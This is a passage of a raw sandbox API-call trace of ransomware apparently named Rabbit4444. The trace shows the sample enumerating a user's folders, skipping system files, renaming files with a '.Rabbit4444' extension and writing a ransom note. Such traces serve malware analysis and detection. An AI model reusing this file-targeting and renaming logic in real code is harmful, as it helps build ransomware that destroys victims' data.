ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0070.933] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.933] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.933] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.933] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.933] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x239fe4e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa6b72c16, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf398ddc4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.933] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.933] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.933] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.933] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.933] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.933] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf398ddc4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf398ddc4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf398ddc4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.933] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.933] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.933] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3918cdcd, ftCreationTime.dwHighDateTime=0x1d327d1, ftLastAccessTime.dwLowDateTime=0x391b3022, ftLastAccessTime.dwHighDateTime=0x1d327d1, ftLastWriteTime.dwLowDateTime=0x393ef4f5, ftLastWriteTime.dwHighDateTime=0x1d327d1, nFileSizeHigh=0x0, nFileSizeLow=0x58b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504785768", cAlternateFileName="150478~1")) returned 1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="Rabbit4444.exe") returned -1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2=".") returned 1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="..") returned 1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="windows") returned -1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="bootmgr") returned -1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="pagefile.sys") returned -1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="boot") returned -1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="ids.txt") returned -1 [0070.933] lstrcmpiW (lpString1="1504785768", lpString2="NTUSER.DAT") returned -1 [0070.933] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504785768" | out: lpString1="1504785768") returned="1504785768" [0070.933] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504785768", dwFileAttributes=0x0) returned 1 [0070.934] lstrlenW (lpString="1504785768") returned 10 [0070.934] lstrlenW (lpString="Rabbit4444") returned 10 [0070.934] lstrcmpiW (lpString1="1504785768", lpString2="Rabbit4444") returned -1 [0070.934] lstrlenW (lpString=".dll") returned 4 [0070.934] lstrcmpiW (lpString1="5768", lpString2=".dll") returned 1 [0070.934] lstrlenW (lpString=".lnk") returned 4 [0070.934] lstrcmpiW (lpString1="5768", lpString2=".lnk") returned 1 [0070.935] lstrlenW (lpString=".ini") returned 4 [0070.935] lstrcmpiW (lpString1="5768", lpString2=".ini") returned 1 [0070.935] lstrlenW (lpString=".sys") returned 4 [0070.935] lstrcmpiW (lpString1="5768", lpString2=".sys") returned 1 [0070.935] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504785768" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\1504785768"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.935] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.935] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16224579065) returned 1 [0070.935] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=22710) returned 1 [0070.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.935] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101628 [0070.935] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5bc0, lpName=0x0) returned 0x27c [0070.936] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5bc0) returned 0x70000 [0070.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x104898 [0070.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104898 | out: hHeap=0xe0000) returned 1 [0070.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0070.939] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104898 [0070.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0070.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104898 | out: hHeap=0xe0000) returned 1 [0070.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.939] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16224993381) returned 1 [0070.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.939] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101628 | out: hHeap=0xe0000) returned 1 [0070.939] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.940] CloseHandle (hObject=0x27c) returned 1 [0070.940] CloseHandle (hObject=0x260) returned 1 [0070.940] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504785768.Rabbit4444") returned 164 [0070.940] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504785768" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\1504785768"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504785768.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\1504785768.rabbit4444"), dwFlags=0x1) returned 1 [0070.940] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2505e10b, ftCreationTime.dwHighDateTime=0x1d327ed, ftLastAccessTime.dwLowDateTime=0x2505e10b, ftLastAccessTime.dwHighDateTime=0x1d327ed, ftLastWriteTime.dwLowDateTime=0x250aa5cc, ftLastWriteTime.dwHighDateTime=0x1d327ed, nFileSizeHigh=0x0, nFileSizeLow=0x3ae8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504797760", cAlternateFileName="150479~1")) returned 1 [0070.940] lstrcmpiW (lpString1="1504797760", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.940] lstrcmpiW (lpString1="1504797760", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="Rabbit4444.exe") returned -1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2=".") returned 1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="..") returned 1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="windows") returned -1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="bootmgr") returned -1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="pagefile.sys") returned -1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="boot") returned -1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="ids.txt") returned -1 [0070.941] lstrcmpiW (lpString1="1504797760", lpString2="NTUSER.DAT") returned -1 [0070.941] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504797760" | out: lpString1="1504797760") returned="1504797760" [0070.941] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504797760", dwFileAttributes=0x0) returned 1 [0070.942] lstrlenW (lpString="1504797760") returned 10 [0070.942] lstrlenW (lpString="Rabbit4444") returned 10 [0070.942] lstrcmpiW (lpString1="1504797760", lpString2="Rabbit4444") returned -1 [0070.942] lstrlenW (lpString=".dll") returned 4 [0070.942] lstrcmpiW (lpString1="7760", lpString2=".dll") returned 1 [0070.942] lstrlenW (lpString=".lnk") returned 4 [0070.942] lstrcmpiW (lpString1="7760", lpString2=".lnk") returned 1 [0070.942] lstrlenW (lpString=".ini") returned 4 [0070.942] lstrcmpiW (lpString1="7760", lpString2=".ini") returned 1 [0070.942] lstrlenW (lpString=".sys") returned 4 [0070.942] lstrcmpiW (lpString1="7760", lpString2=".sys") returned 1 [0070.942] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504797760" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\1504797760"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.943] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.943] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16225362967) returned 1 [0070.943] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=15080) returned 1 [0070.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0070.943] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0070.943] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3df0, lpName=0x0) returned 0x27c [0070.944] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3df0) returned 0x70000 [0070.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110ae0 [0070.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0070.946] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110ae0 | out: hHeap=0xe0000) returned 1 [0070.946] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0070.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104898 [0070.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0070.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104898 | out: hHeap=0xe0000) returned 1 [0070.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0070.947] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16225762897) returned 1 [0070.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0070.947] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0070.947] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.947] CloseHandle (hObject=0x27c) returned 1 [0070.948] CloseHandle (hObject=0x260) returned 1 [0070.948] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504797760.Rabbit4444") returned 164 [0070.948] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504797760" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\1504797760"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\1504797760.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\1504797760.rabbit4444"), dwFlags=0x1) returned 1 [0070.948] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239fe4e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x239fe4e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4a3580d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.948] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.948] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.948] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.948] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.948] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.949] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.949] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.949] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.949] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.949] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.949] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.949] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.949] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.949] lstrlenW (lpString="Rabbit4444") returned 10 [0070.949] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.949] lstrlenW (lpString=".dll") returned 4 [0070.949] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.949] lstrlenW (lpString=".lnk") returned 4 [0070.949] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.949] lstrlenW (lpString=".ini") returned 4 [0070.949] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.949] lstrlenW (lpString=".sys") returned 4 [0070.949] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.949] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239fe4e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa6a8def4, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa4a3580d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.949] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.949] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.949] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.950] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.950] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.950] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.950] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.950] lstrlenW (lpString="Rabbit4444") returned 10 [0070.950] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.950] lstrlenW (lpString=".dll") returned 4 [0070.950] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.950] lstrlenW (lpString=".lnk") returned 4 [0070.950] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.950] lstrlenW (lpString=".ini") returned 4 [0070.950] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.950] lstrlenW (lpString=".sys") returned 4 [0070.950] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.950] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239fe4e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa6a8def4, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa4a3580d, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.950] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0070.950] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279986\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279986\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.951] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.951] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.954] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.954] CloseHandle (hObject=0x260) returned 1 [0070.954] CloseHandle (hObject=0x228) returned 1 [0070.955] GetCurrentThreadId () returned 0xd98 [0070.955] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122168 [0070.955] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978" [0070.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104770 | out: hHeap=0xe0000) returned 1 [0070.955] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122160 | out: hHeap=0xe0000) returned 1 [0070.955] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978" [0070.955] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\" [0070.955] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\.BFC0E91B00AE8A0620D3" [0070.955] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\279978\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.959] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.962] FlushFileBuffers (hFile=0x228) returned 1 [0070.963] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.963] CloseHandle (hObject=0x228) returned 1 [0070.964] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978") returned 142 [0070.964] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.964] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\279978\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfed624f3, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xaabc7b4a, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xf39f1f48, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, 